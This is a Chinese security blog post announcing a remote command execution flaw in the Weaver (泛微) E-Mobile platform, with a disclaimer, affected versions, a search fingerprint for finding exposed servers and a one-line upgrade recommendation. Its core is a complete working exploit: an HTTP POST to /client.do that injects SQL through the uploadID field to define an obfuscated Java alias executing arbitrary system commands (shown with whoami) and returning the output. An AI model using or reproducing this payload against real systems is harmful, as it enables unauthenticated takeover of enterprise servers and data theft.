当前位置:首页 > 文章 > 0day

泛微E-Mobile 远程命令执行漏洞(RCE)附POC

admin2周前 (02-12)0day12
摘要:免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。…

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。



01

漏洞名称


泛微E-Mobile 远程命令执行漏洞


02


影响版本

泛微E-Mobile移动管理平台多个版本,部分漏洞影响版本为2024.3前

版本,部分涉及E-Mobile 6.0等版本。


03


漏洞简介

泛微e-Mobile移动管理平台是上海泛微网络科技股份有限公司推出的一款移动办公平台,旨在帮助企业构建以员工为核心的移动统一办公平台。它将企业ERP、CRM、OA等各类系统应用融合在一个平台,覆盖组织管理、业务、财务等各方面,通过统一组织、统一消息、统一应用、统一搜索、统一报表等功能,实现信息聚合与高效协同。攻击者可利用漏洞绕过身份验证,执行任意系统命令,获取服务器控制权,可能导致数据泄露、系统被控、植入后门等严重后果。


04

资产测绘

"Weaver E-Mobile"

  

05

漏洞复现

POC






















POST /client.do HTTP/1.1Host:  127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: JSESSIONID=abcrCRF1rJkt_4V8s_ikz; ecology_JSessionid=abcrCRF1rJkt_4V8s_ikz; testBanCookie=test; Systemlanguid=7Upgrade-Insecure-Requests: 1Priority: u=0, iPragma: no-cacheCache-Control: no-cacheContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryyBvZrAkWyCD8dThVContent-Length: 1131------WebKitFormBoundaryyBvZrAkWyCD8dThVContent-Disposition: form-data; name="method"getupload------WebKitFormBoundaryyBvZrAkWyCD8dThVContent-Disposition: form-data; name="uploadID"1';CREATE ALIAS if not exists abcd AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass("com.caucho.server.dispatch.ServletInvocation").getMet','hod("getContextRequest").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField("_response");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod("getWriter");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter("\\A");writer.write(scan','ner.hasNext()?sca','nner.next():"");}');CALL abcd('whoami');--------WebKitFormBoundaryyBvZrAkWyCD8dThV--

06


修复建议

升级到安全版本


07


往期回顾







扫描二维码推送至手机访问。

版权声明:本文由日常随记发布,如需转载请注明出处。

本文链接:https://www.7x0.cn/post/26.html

“泛微E-Mobile 远程命令执行漏洞(RCE)附POC” 的相关文章

紧急预警:iPhone 曝高危漏洞,黑客已实际攻击!

紧急预警:iPhone 曝高危漏洞,黑客已实际攻击!

近日,苹果官网紧急发布安全公告,正式确认两款高危 WebKit 漏洞(编号 CVE-2025-43529 与 CVE-2025-14174)存在严重安全隐患——目前这两个漏洞已被黑客主动利用,且已有用户遭遇攻击。…

winrar CVE-2025-8088复现学习

winrar CVE-2025-8088复现学习

CVE-2025-8088 (CVSS 8.4)…

飞牛系统(fnOS)任意文件读取漏洞 附POC

飞牛系统(fnOS)任意文件读取漏洞 附POC

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后…